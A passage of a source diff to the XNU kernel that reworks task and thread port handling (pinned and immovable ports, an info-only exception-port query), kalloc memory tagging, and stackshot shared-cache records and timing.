ipc_port_t port) +{ + thread_read_t thread = THREAD_READ_NULL; + + if (IP_VALID(port)) { + ip_lock(port); + if (ip_active(port)) { + thread = convert_port_to_thread_read_locked(port, FALSE); } ip_unlock(port); } @@ -2853,16 +3271,13 @@ convert_thread_to_port_with_flavor( thread_mtx_lock(thread); - if (thread->ith_self[THREAD_FLAVOR_CONTROL] == IP_NULL) { + if (!thread->ipc_active) { goto exit; } if (flavor == THREAD_FLAVOR_CONTROL) { - port = ipc_port_make_send(thread->ith_self[flavor]); + port = ipc_port_make_send(thread->ith_thread_ports[flavor]); } else { - if (!thread->active) { - goto exit; - } ipc_kobject_type_t kotype = (flavor == THREAD_FLAVOR_READ) ? IKOT_THREAD_READ : IKOT_THREAD_INSPECT; /* * Claim a send right on the thread read/inspect port, and request a no-senders @@ -2873,9 +3288,9 @@ convert_thread_to_port_with_flavor( * send-once notification firing, and this is done under the thread mutex * rather than with atomics. */ - (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_self[flavor], (ipc_kobject_t)thread, - kotype, false, 0); - port = thread->ith_self[flavor]; + (void)ipc_kobject_make_send_lazy_alloc_port(&thread->ith_thread_ports[flavor], (ipc_kobject_t)thread, + kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, false, 0); + port = thread->ith_thread_ports[flavor]; } exit: @@ -2977,7 +3392,7 @@ port_name_to_task_read( if (MACH_PORT_VALID(name)) { kr = ipc_port_translate_send(current_space(), name, &kport); if (kr == KERN_SUCCESS) { - tr = convert_port_to_task_read_locked(kport); + tr = convert_port_to_task_read_locked(kport, TRUE); ip_unlock(kport); } } @@ -2989,8 +3404,7 @@ port_name_to_task_read( * Purpose: * Convert from a port name to a task reference * A name of MACH_PORT_NULL is valid for the null task. - * It doesnt run the task_conversion_eval check if the port - * is of type IKOT_TASK_CONTROL. + * Skips task_conversion_eval() during conversion. * Conditions: * Nothing locked. 
*/ @@ -3005,48 +3419,13 @@ port_name_to_task_read_no_eval( if (MACH_PORT_VALID(name)) { kr = ipc_port_translate_send(current_space(), name, &kport); if (kr == KERN_SUCCESS) { - switch (ip_kotype(kport)) { - case IKOT_TASK_CONTROL: - tr = convert_port_to_task_locked(kport, NULL, FALSE); - break; - case IKOT_TASK_READ: - tr = convert_port_to_task_read_locked(kport); - break; - default: - break; - } + tr = convert_port_to_task_read_locked(kport, FALSE); ip_unlock(kport); } } return tr; } -/* - * Routine: port_name_to_task_inspect - * Purpose: - * Convert from a port name to a task reference - * A name of MACH_PORT_NULL is valid for the null task. - * Conditions: - * Nothing locked. - */ -task_inspect_t -port_name_to_task_inspect( - mach_port_name_t name) -{ - ipc_port_t kport; - kern_return_t kr; - task_inspect_t ti = TASK_INSPECT_NULL; - - if (MACH_PORT_VALID(name)) { - kr = ipc_port_translate_send(current_space(), name, &kport); - if (kr == KERN_SUCCESS) { - ti = convert_port_to_task_inspect_locked(kport); - ip_unlock(kport); - } - } - return ti; -} - /* * Routine: port_name_to_task_name * Purpose: @@ -3118,10 +3497,14 @@ convert_task_to_port_with_flavor( itk_lock(task); + if (!task->ipc_active) { + goto exit; + } + switch (flavor) { case TASK_FLAVOR_CONTROL: case TASK_FLAVOR_NAME: - port = ipc_port_make_send(task->itk_self[flavor]); + port = ipc_port_make_send(task->itk_task_ports[flavor]); break; /* * Claim a send right on the task read/inspect port, and request a no-senders @@ -3133,14 +3516,11 @@ convert_task_to_port_with_flavor( */ case TASK_FLAVOR_READ: case TASK_FLAVOR_INSPECT: - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { - /* task is either disabled or terminated */ - goto exit; - } kotype = (flavor == TASK_FLAVOR_READ) ? 
IKOT_TASK_READ : IKOT_TASK_INSPECT; - (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_self[flavor], - (ipc_kobject_t)task, kotype, true, OS_PTRAUTH_DISCRIMINATOR("task.itk_self")); - port = task->itk_self[flavor]; + (void)ipc_kobject_make_send_lazy_alloc_port((ipc_port_t *) &task->itk_task_ports[flavor], + (ipc_kobject_t)task, kotype, IPC_KOBJECT_ALLOC_IMMOVABLE_SEND, true, + OS_PTRAUTH_DISCRIMINATOR("task.itk_task_ports")); + port = task->itk_task_ports[flavor]; break; } @@ -3179,6 +3559,22 @@ convert_task_name_to_port( return convert_task_to_port_with_flavor(task, TASK_FLAVOR_NAME); } +ipc_port_t +convert_task_to_port_pinned( + task_t task) +{ + ipc_port_t port = IP_NULL; + + itk_lock(task); + + if (task->ipc_active && task->itk_self != IP_NULL) { + port = ipc_port_make_send(task->itk_self); + } + + itk_unlock(task); + task_deallocate(task); + return port; +} /* * Routine: convert_task_suspend_token_to_port * Purpose: @@ -3218,6 +3614,22 @@ convert_task_suspension_token_to_port( return port; } +ipc_port_t +convert_thread_to_port_pinned( + thread_t thread) +{ + ipc_port_t port = IP_NULL; + + thread_mtx_lock(thread); + + if (thread->ipc_active && thread->ith_self != IP_NULL) { + port = ipc_port_make_send(thread->ith_self); + } + + thread_mtx_unlock(thread); + thread_deallocate(thread); + return port; +} /* * Routine: space_deallocate * Purpose: @@ -3377,7 +3789,7 @@ thread_set_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3436,9 +3848,8 @@ task_set_exception_ports( itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); - return KERN_FAILURE; } @@ -3471,7 +3882,7 @@ task_set_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3620,7 +4031,7 @@ 
thread_swap_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3681,7 +4092,7 @@ task_swap_exception_ports( itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); #if CONFIG_MACF mac_exc_free_label(new_label); @@ -3740,7 +4151,7 @@ task_swap_exception_ports( } } - if (IP_VALID(new_port)) { /* consume send right */ + if (IP_VALID(new_port)) { /* consume send right */ ipc_port_release_send(new_port); } @@ -3767,27 +4178,21 @@ task_swap_exception_ports( * Illegal mask bit set. * KERN_FAILURE The thread is dead. */ -kern_return_t -thread_get_exception_ports( - thread_t thread, - exception_mask_t exception_mask, - exception_mask_array_t masks, - mach_msg_type_number_t *CountCnt, - exception_port_array_t ports, - exception_behavior_array_t behaviors, - thread_state_flavor_array_t flavors); - -kern_return_t -thread_get_exception_ports( - thread_t thread, - exception_mask_t exception_mask, +static kern_return_t +thread_get_exception_ports_internal( + thread_t thread, + exception_mask_t exception_mask, exception_mask_array_t masks, mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, exception_port_array_t ports, exception_behavior_array_t behaviors, thread_state_flavor_array_t flavors) { - unsigned int i, j, count; + unsigned int count; + boolean_t info_only = (ports_info != NULL); + boolean_t dbg_ok = TRUE; + ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, does not hold right */ if (thread == THREAD_NULL) { return KERN_INVALID_ARGUMENT; @@ -3797,6 +4202,18 @@ thread_get_exception_ports( return KERN_INVALID_ARGUMENT; } + if (!info_only && !ports) { + return KERN_INVALID_ARGUMENT; + } + +#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF + if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) { + dbg_ok = TRUE; + } else { + dbg_ok = FALSE; + } 
+#endif + thread_mtx_lock(thread); if (!thread->active) { @@ -3811,30 +4228,45 @@ thread_get_exception_ports( goto done; } - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) { + for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) { if (exception_mask & (1 << i)) { + ipc_port_t exc_port = thread->exc_actions[i].port; + exception_behavior_t exc_behavior = thread->exc_actions[i].behavior; + thread_state_flavor_t exc_flavor = thread->exc_actions[i].flavor; + for (j = 0; j < count; ++j) { /* * search for an identical entry, if found * set corresponding mask for this exception. */ - if (thread->exc_actions[i].port == ports[j] && - thread->exc_actions[i].behavior == behaviors[j] && - thread->exc_actions[i].flavor == flavors[j]) { + if (exc_port == port_ptrs[j] && + exc_behavior == behaviors[j] && + exc_flavor == flavors[j]) { masks[j] |= (1 << i); break; } } - if (j == count) { + if (j == count && count < *CountCnt) { masks[j] = (1 << i); - ports[j] = ipc_port_copy_send(thread->exc_actions[i].port); - behaviors[j] = thread->exc_actions[i].behavior; - flavors[j] = thread->exc_actions[i].flavor; - ++count; - if (count >= *CountCnt) { - break; + port_ptrs[j] = exc_port; + + if (info_only) { + if (!dbg_ok || !IP_VALID(exc_port)) { + /* avoid taking port lock if !dbg_ok */ + ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 }; + } else { + uintptr_t receiver; + (void)ipc_port_get_receiver_task(exc_port, &receiver); + ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port); + ports_info[j].iip_receiver_object = receiver ? 
(natural_t)VM_KERNEL_ADDRPERM(receiver) : 0; + } + } else { + ports[j] = ipc_port_copy_send(exc_port); } + behaviors[j] = exc_behavior; + flavors[j] = exc_flavor; + ++count; } } } @@ -3847,51 +4279,84 @@ done: return KERN_SUCCESS; } +static kern_return_t +thread_get_exception_ports( + thread_t thread, + exception_mask_t exception_mask, + exception_mask_array_t masks, + mach_msg_type_number_t *CountCnt, + exception_port_array_t ports, + exception_behavior_array_t behaviors, + thread_state_flavor_array_t flavors) +{ + return thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt, + NULL, ports, behaviors, flavors); +} + kern_return_t -thread_get_exception_ports_from_user( +thread_get_exception_ports_info( mach_port_t port, exception_mask_t exception_mask, exception_mask_array_t masks, - mach_msg_type_number_t *CountCnt, - exception_port_array_t ports, + mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, exception_behavior_array_t behaviors, thread_state_flavor_array_t flavors) { kern_return_t kr; - thread_t thread = convert_port_to_thread_check_type(port, NULL, THREAD_FLAVOR_CONTROL, FALSE); + thread_t thread = convert_port_to_thread_read_no_eval(port); if (thread == THREAD_NULL) { return KERN_INVALID_ARGUMENT; } - kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors); + kr = thread_get_exception_ports_internal(thread, exception_mask, masks, CountCnt, + ports_info, NULL, behaviors, flavors); thread_deallocate(thread); return kr; } kern_return_t -task_get_exception_ports( - task_t task, - exception_mask_t exception_mask, +thread_get_exception_ports_from_user( + mach_port_t port, + exception_mask_t exception_mask, exception_mask_array_t masks, - mach_msg_type_number_t *CountCnt, + mach_msg_type_number_t *CountCnt, exception_port_array_t ports, exception_behavior_array_t behaviors, - thread_state_flavor_array_t flavors); + thread_state_flavor_array_t flavors) +{ + kern_return_t 
kr; -kern_return_t -task_get_exception_ports( - task_t task, - exception_mask_t exception_mask, + thread_t thread = convert_port_to_thread_no_eval(port); + + if (thread == THREAD_NULL) { + return KERN_INVALID_ARGUMENT; + } + + kr = thread_get_exception_ports(thread, exception_mask, masks, CountCnt, ports, behaviors, flavors); + + thread_deallocate(thread); + return kr; +} + +static kern_return_t +task_get_exception_ports_internal( + task_t task, + exception_mask_t exception_mask, exception_mask_array_t masks, mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, exception_port_array_t ports, exception_behavior_array_t behaviors, thread_state_flavor_array_t flavors) { - unsigned int i, j, count; + unsigned int count; + boolean_t info_only = (ports_info != NULL); + boolean_t dbg_ok = TRUE; + ipc_port_t port_ptrs[EXC_TYPES_COUNT]; /* pointers only, does not hold right */ if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; @@ -3901,40 +4366,66 @@ task_get_exception_ports( return KERN_INVALID_ARGUMENT; } + if (!info_only && !ports) { + return KERN_INVALID_ARGUMENT; + } + +#if !(DEVELOPMENT || DEBUG) && CONFIG_MACF + if (info_only && mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0) { + dbg_ok = TRUE; + } else { + dbg_ok = FALSE; + } +#endif + itk_lock(task); - if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) { + if (!task->ipc_active) { itk_unlock(task); - return KERN_FAILURE; } count = 0; - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) { + for (int i = FIRST_EXCEPTION, j = 0; i < EXC_TYPES_COUNT; ++i) { if (exception_mask & (1 << i)) { + ipc_port_t exc_port = task->exc_actions[i].port; + exception_behavior_t exc_behavior = task->exc_actions[i].behavior; + thread_state_flavor_t exc_flavor = task->exc_actions[i].flavor; + for (j = 0; j < count; ++j) { /* * search for an identical entry, if found * set corresponding mask for this exception. 
*/ - if (task->exc_actions[i].port == ports[j] && - task->exc_actions[i].behavior == behaviors[j] && - task->exc_actions[i].flavor == flavors[j]) { + if (exc_port == port_ptrs[j] && + exc_behavior == behaviors[j] && + exc_flavor == flavors[j]) { masks[j] |= (1 << i); break; } } - if (j == count) { + if (j == count && count < *CountCnt) { masks[j] = (1 << i); - ports[j] = ipc_port_copy_send(task->exc_actions[i].port); - behaviors[j] = task->exc_actions[i].behavior; - flavors[j] = task->exc_actions[i].flavor; - ++count; - if (count > *CountCnt) { - break; + port_ptrs[j] = exc_port; + + if (info_only) { + if (!dbg_ok || !IP_VALID(exc_port)) { + /* avoid taking port lock if !dbg_ok */ + ports_info[j] = (ipc_info_port_t){ .iip_port_object = 0, .iip_receiver_object = 0 }; + } else { + uintptr_t receiver; + (void)ipc_port_get_receiver_task(exc_port, &receiver); + ports_info[j].iip_port_object = (natural_t)VM_KERNEL_ADDRPERM(exc_port); + ports_info[j].iip_receiver_object = receiver ? (natural_t)VM_KERNEL_ADDRPERM(receiver) : 0; + } + } else { + ports[j] = ipc_port_copy_send(exc_port); } + behaviors[j] = exc_behavior; + flavors[j] = exc_flavor; + ++count; } } } @@ -3946,6 +4437,45 @@ task_get_exception_ports( return KERN_SUCCESS; } +static kern_return_t +task_get_exception_ports( + task_t task, + exception_mask_t exception_mask, + exception_mask_array_t masks, + mach_msg_type_number_t *CountCnt, + exception_port_array_t ports, + exception_behavior_array_t behaviors, + thread_state_flavor_array_t flavors) +{ + return task_get_exception_ports_internal(task, exception_mask, masks, CountCnt, + NULL, ports, behaviors, flavors); +} + +kern_return_t +task_get_exception_ports_info( + mach_port_t port, + exception_mask_t exception_mask, + exception_mask_array_t masks, + mach_msg_type_number_t *CountCnt, + exception_port_info_array_t ports_info, + exception_behavior_array_t behaviors, + thread_state_flavor_array_t flavors) +{ + kern_return_t kr; + + task_t task = 
convert_port_to_task_read_no_eval(port); + + if (task == TASK_NULL) { + return KERN_INVALID_ARGUMENT; + } + + kr = task_get_exception_ports_internal(task, exception_mask, masks, CountCnt, + ports_info, NULL, behaviors, flavors); + + task_deallocate(task); + return kr; +} + kern_return_t task_get_exception_ports_from_user( mach_port_t port, @@ -3958,7 +4488,7 @@ task_get_exception_ports_from_user( { kern_return_t kr; - task_t task = convert_port_to_task_check_type(port, NULL, TASK_FLAVOR_CONTROL, FALSE); + task_t task = convert_port_to_task_no_eval(port); if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; @@ -3969,3 +4499,35 @@ task_get_exception_ports_from_user( task_deallocate(task); return kr; } + +/* + * Routine: ipc_thread_port_unpin + * Purpose: + * Called on the thread port when the thread is + * terminating so that the last ref can be deallocated + * without a guard exception. + * Conditions: + * Thread mutex lock is held. + * check_bit should be set to true only when port is expected + * to have ip_pinned bit set. 
+ */ +void +ipc_thread_port_unpin( + ipc_port_t port, + __unused bool check_bit) +{ + if (port == IP_NULL) { + return; + } + ip_lock(port); + imq_lock(&port->ip_messages); +#if DEVELOPMENT || DEBUG + if (pinned_control_port_enabled && check_bit) { + assert(ip_is_control(port)); /*remove once we get rid of boot-arg */ + assert(port->ip_pinned == 1); + } +#endif + port->ip_pinned = 0; + imq_unlock(&port->ip_messages); + ip_unlock(port); +} diff --git a/osfmk/kern/ipc_tt.h b/osfmk/kern/ipc_tt.h index 2ebe7e289..1e8d2c401 100644 --- a/osfmk/kern/ipc_tt.h +++ b/osfmk/kern/ipc_tt.h @@ -93,9 +93,16 @@ extern void ipc_task_reset( extern void ipc_task_terminate( task_t task); +__options_decl(ipc_thread_init_options_t, uint32_t, { + IPC_THREAD_INIT_NONE = 0x00, + IPC_THREAD_INIT_PINNED = 0x01, + IPC_THREAD_INIT_IMMOVABLE = 0x02, +}); + /* Initialize a thread's IPC state */ extern void ipc_thread_init( - thread_t thread); + thread_t thread, + ipc_thread_init_options_t options); extern void ipc_thread_init_exc_actions( thread_t thread); @@ -168,6 +175,10 @@ extern task_read_t convert_port_to_task_read( extern task_t convert_port_to_task( ipc_port_t port); +/* Convert from a port to a pinned task */ +extern task_t convert_port_to_task_pinned( + ipc_port_t port); + extern task_t convert_port_to_task_with_exec_token( ipc_port_t port, @@ -183,9 +194,6 @@ extern task_read_t port_name_to_task_read( extern task_read_t port_name_to_task_read_no_eval( mach_port_name_t name); -extern task_inspect_t port_name_to_task_inspect( - mach_port_name_t name); - extern task_t port_name_to_task_name( mach_port_name_t name); @@ -254,4 +262,10 @@ extern void space_read_deallocate( extern void space_inspect_deallocate( ipc_space_inspect_t space); +#if MACH_KERNEL_PRIVATE +extern void ipc_thread_port_unpin( + ipc_port_t port, + bool check_bit); +#endif + #endif /* _KERN_IPC_TT_H_ */ diff --git a/osfmk/kern/kalloc.c b/osfmk/kern/kalloc.c index 6c4127fa6..b77841e1c 100644 --- a/osfmk/kern/kalloc.c +++ 
b/osfmk/kern/kalloc.c @@ -750,8 +750,8 @@ kalloc_large( zalloc_flags_t flags, vm_allocation_site_t *site) { - int kma_flags = KMA_ATOMIC | KMA_KOBJECT; - vm_tag_t tag = VM_KERN_MEMORY_KALLOC; + int kma_flags = KMA_ATOMIC; + vm_tag_t tag; vm_map_t alloc_map; vm_offset_t addr; @@ -764,6 +764,16 @@ kalloc_large( return (struct kalloc_result){ }; } +#ifndef __x86_64__ + /* + * (73465472) on Intel we didn't use to pass this flag, + * which in turn allowed kalloc_large() memory to be shared + * with user directly. + * + * We're bound by this unfortunate ABI. + */ + kma_flags |= KMA_KOBJECT; +#endif if (flags & Z_NOPAGEWAIT) { kma_flags |= KMA_NOPAGEWAIT; } @@ -781,8 +791,13 @@ kalloc_large( alloc_map = kalloc_map_for_size(size); - if (site) { - tag = vm_tag_alloc(site); + tag = zalloc_flags_get_tag(flags); + if (tag == VM_KERN_MEMORY_NONE) { + if (site) { + tag = vm_tag_alloc(site); + } else { + tag = VM_KERN_MEMORY_KALLOC; + } } if (kmem_alloc_flags(alloc_map, &addr, size, tag, kma_flags) != KERN_SUCCESS) { @@ -864,7 +879,6 @@ kalloc_ext( zalloc_flags_t flags, vm_allocation_site_t *site) { - vm_tag_t tag = VM_KERN_MEMORY_KALLOC; vm_size_t size; void *addr; zone_t z; @@ -881,7 +895,7 @@ kalloc_ext( * Kasan for kalloc heaps will put the redzones *inside* * the allocation, and hence augment its size. * - * kalloc heaps do not use zone_t::kasan_redzone. + * kalloc heaps do not use zone_t::z_kasan_redzone. 
*/ #if KASAN_KALLOC size = kasan_alloc_resize(req_size); @@ -903,15 +917,19 @@ kalloc_ext( assert(size <= zone_elem_size(z)); #if VM_MAX_TAG_ZONES - if (z->tags && site) { - tag = vm_tag_alloc(site); - if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) && !vm_allocation_zone_totals[tag]) { - tag = VM_KERN_MEMORY_KALLOC; + if (z->tags) { + vm_tag_t tag = zalloc_flags_get_tag(flags); + if (tag == VM_KERN_MEMORY_NONE && site) { + tag = vm_tag_alloc(site); + } + if (tag != VM_KERN_MEMORY_NONE) { + tag = vm_tag_will_update_zone(tag, z->tag_zone_index, + flags & (Z_WAITOK | Z_NOWAIT | Z_NOPAGEWAIT)); } + flags |= Z_VM_TAG(tag); } #endif - addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats, - flags | Z_VM_TAG(tag), zone_elem_size(z) - size); + addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats, flags); #if KASAN_KALLOC addr = (void *)kasan_alloc((vm_offset_t)addr, zone_elem_size(z), diff --git a/osfmk/kern/kcdata.h b/osfmk/kern/kcdata.h index f2eaf624c..d57bd0c27 100644 --- a/osfmk/kern/kcdata.h +++ b/osfmk/kern/kcdata.h @@ -492,7 +492,7 @@ struct kcdata_type_definition { #define STACKSHOT_KCTYPE_TASK_SNAPSHOT 0x905u /* task_snapshot_v2 */ #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT 0x906u /* thread_snapshot_v2, thread_snapshot_v3 */ #define STACKSHOT_KCTYPE_DONATING_PIDS 0x907u /* int[] */ -#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 */ +#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO 0x908u /* dyld_shared_cache_loadinfo */ #define STACKSHOT_KCTYPE_THREAD_NAME 0x909u /* char[] */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME 0x90Au /* struct stack_snapshot_frame32 */ #define STACKSHOT_KCTYPE_KERN_STACKFRAME64 0x90Bu /* struct stack_snapshot_frame64 */ @@ -556,17 +556,42 @@ struct dyld_uuid_info_64 { uuid_t imageUUID; }; +/* + * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures + * instead of this, since the field names match their contents better. 
+ */ struct dyld_uuid_info_64_v2 { uint64_t imageLoadAddress; /* XXX image slide */ uuid_t imageUUID; /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ - uint64_t imageSlidBaseAddress; /* slid base address of image */ + uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */ +}; + +/* + * This is the renamed version of dyld_uuid_info_64 with more accurate + * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO. Any users + * must be aware of the dyld_uuid_info_64* version history and ensure + * the fields they are accessing are within the actual bounds. + * + * OLD_FIELD NEW_FIELD + * imageLoadAddress sharedCacheSlide + * imageUUID sharedCacheUUID + * imageSlidBaseAddress sharedCacheUnreliableSlidBaseAddress + * - sharedCacheSlidFirstMapping + */ +struct dyld_shared_cache_loadinfo { + uint64_t sharedCacheSlide; /* image slide value */ + uuid_t sharedCacheUUID; + /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */ + uint64_t sharedCacheUnreliableSlidBaseAddress; /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */ + /* end of version 2 of dyld_uuid_info_64. 
sizeof v2 was 32 */ + uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */ }; struct dyld_aot_cache_uuid_info { - uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */ + uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */ uuid_t x86UUID; /* UUID of x86 shared cache */ - uint64_t aotSlidBaseAddress; /* slide base address of aot cache */ + uint64_t aotSlidBaseAddress; /* slid first mapping address of aot cache */ uuid_t aotUUID; /* UUID of aot shared cache */ }; @@ -618,6 +643,9 @@ enum task_snapshot_flags { kTaskIsDirtyTracked = 0x4000000, kTaskAllowIdleExit = 0x8000000, kTaskIsTranslated = 0x10000000, + kTaskSharedRegionNone = 0x20000000, /* task doesn't have a shared region */ + kTaskSharedRegionSystem = 0x40000000, /* task is attached to system shared region */ + kTaskSharedRegionOther = 0x80000000, /* task is attached to a different shared region */ }; enum thread_snapshot_flags { @@ -876,6 +904,12 @@ struct stackshot_duration { uint64_t stackshot_duration_outer; } __attribute__((packed)); +struct stackshot_duration_v2 { + uint64_t stackshot_duration; + uint64_t stackshot_duration_outer; + uint64_t stackshot_duration_prior; +} __attribute__((packed)); + struct stackshot_fault_stats { uint32_t sfs_pages_faulted_in; /* number of pages faulted in using KDP fault path */ uint64_t sfs_time_spent_faulting; /* MATUs spent faulting */ diff --git a/osfmk/kern/kern_stackshot.c b/osfmk/kern/kern_stackshot.c index 6edec68be..f424b0aee 100644 --- a/osfmk/kern/kern_stackshot.c +++ b/osfmk/kern/kern_stackshot.c @@ -53,6 +53,7 @@ #include #include #include +#include #include #include #include @@ -115,6 +116,8 @@ static boolean_t panic_stackshot; static boolean_t stack_enable_faulting = FALSE; static struct stackshot_fault_stats fault_stats; +static uint32_t stackshot_initial_estimate; +static uint64_t stackshot_duration_prior_abs; /* prior attempts, abs */ static unaligned_u64 * 
stackshot_duration_outer; static uint64_t stackshot_microsecs; @@ -385,6 +388,11 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui goto out; } + stackshot_initial_estimate = 0; + stackshot_duration_prior_abs = 0; + stackshot_duration_outer = NULL; + uint64_t time_start = mach_absolute_time(); + istate = ml_set_interrupts_enabled(FALSE); /* Preload trace parameters*/ @@ -399,6 +407,10 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui ml_set_interrupts_enabled(istate); + uint64_t time_end = mach_absolute_time(); + if (stackshot_duration_outer) { + *stackshot_duration_outer = time_end - time_start; + } *bytes_traced = kdp_stack_snapshot_bytes_traced(); out: @@ -691,7 +703,9 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi goto error_exit; } + stackshot_duration_prior_abs = 0; stackshotbuf_size = get_stackshot_estsize(size_hint); + stackshot_initial_estimate = stackshotbuf_size; for (; stackshotbuf_size <= max_tracebuf_size; stackshotbuf_size <<= 1) { if (kmem_alloc_flags(kernel_map, (vm_offset_t *)&stackshotbuf, stackshotbuf_size, VM_KERN_MEMORY_DIAG, KMA_ZERO) != KERN_SUCCESS) { @@ -755,6 +769,8 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi /* * If we didn't allocate a big enough buffer, deallocate and try again. 
*/ + stackshot_duration_prior_abs += + (time_end - time_start); continue; } else { goto error_exit; @@ -968,16 +984,25 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_ kern_return_t error = KERN_SUCCESS; uint64_t shared_cache_slide = 0; - uint64_t shared_cache_base_address = 0; + uint64_t shared_cache_first_mapping = 0; uint32_t kdp_fault_results = 0; - struct dyld_uuid_info_64_v2 shared_cache_data = {0}; + struct dyld_shared_cache_loadinfo shared_cache_data = {0}; assert(task_snap_ss_flags != NULL); + /* Get basic info about the shared region pointer, regardless of any failures */ + if (task->shared_region == NULL) { + *task_snap_ss_flags |= kTaskSharedRegionNone; + } else if (task->shared_region == primary_system_shared_region) { + *task_snap_ss_flags |= kTaskSharedRegionSystem; + } else { + *task_snap_ss_flags |= kTaskSharedRegionOther; + } + if (task->shared_region && ml_validate_nofault((vm_offset_t)task->shared_region, sizeof(struct vm_shared_region))) { struct vm_shared_region *sr = task->shared_region; - shared_cache_base_address = sr->sr_base_address + sr->sr_first_mapping; + shared_cache_first_mapping = sr->sr_base_address + sr->sr_first_mapping; } else { *task_snap_ss_flags |= kTaskSharedRegionInfoUnavailable; @@ -985,7 +1010,7 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_ } /* We haven't copied in the shared region UUID yet as part of setup */ - if (!shared_cache_base_address || !task->shared_region->sr_uuid_copied) { + if (!shared_cache_first_mapping || !task->shared_region->sr_uuid_copied) { goto error_exit; } @@ -995,15 +1020,27 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_ */ shared_cache_slide = task->shared_region->sr_slide; - if (task->shared_region == init_task_shared_region) { + if (task->shared_region == primary_system_shared_region) { /* skip adding shared cache info -- it's the same as the system level one */ goto error_exit; } - 
shared_cache_data.imageLoadAddress = shared_cache_slide; - stackshot_memcpy(&shared_cache_data.imageUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid)); - shared_cache_data.imageSlidBaseAddress = shared_cache_base_address; - kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(struct dyld_uuid_info_64_v2), &shared_cache_data)); + /* + * Historically, this data was in a dyld_uuid_info_64 structure, but the + * naming of both the structure and fields for this use wasn't great. The + * dyld_shared_cache_loadinfo structure has better names, but the same + * layout and content as the original. + * + * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field + * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT + * entries; here, it's the slid first mapping, and we leave it that way + * for backwards compatibility. + */ + shared_cache_data.sharedCacheSlide = shared_cache_slide; + stackshot_memcpy(&shared_cache_data.sharedCacheUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid)); + shared_cache_data.sharedCacheUnreliableSlidBaseAddress = shared_cache_first_mapping; + shared_cache_data.sharedCacheSlidFirstMapping = shared_cache_first_mapping; + kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(shared_cache_data), &shared_cache_data)); error_exit: if (kdp_fault_results & KDP_FAULT_RESULT_PAGED_OUT) { @@ -1347,7 +1384,7 @@ kcdata_record_task_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t trace cur_tsnap->ts_did_throttle = (uint32_t) proc_did_throttle_from_task(task); cur_tsnap->ts_suspend_count = task->suspend_count; - cur_tsnap->ts_faults = task->faults; + cur_tsnap->ts_faults = counter_load(&task->faults); cur_tsnap->ts_pageins = task->pageins; cur_tsnap->ts_cow_faults = task->cow_faults; cur_tsnap->ts_latency_qos = (task->effective_policy.tep_latency_qos == 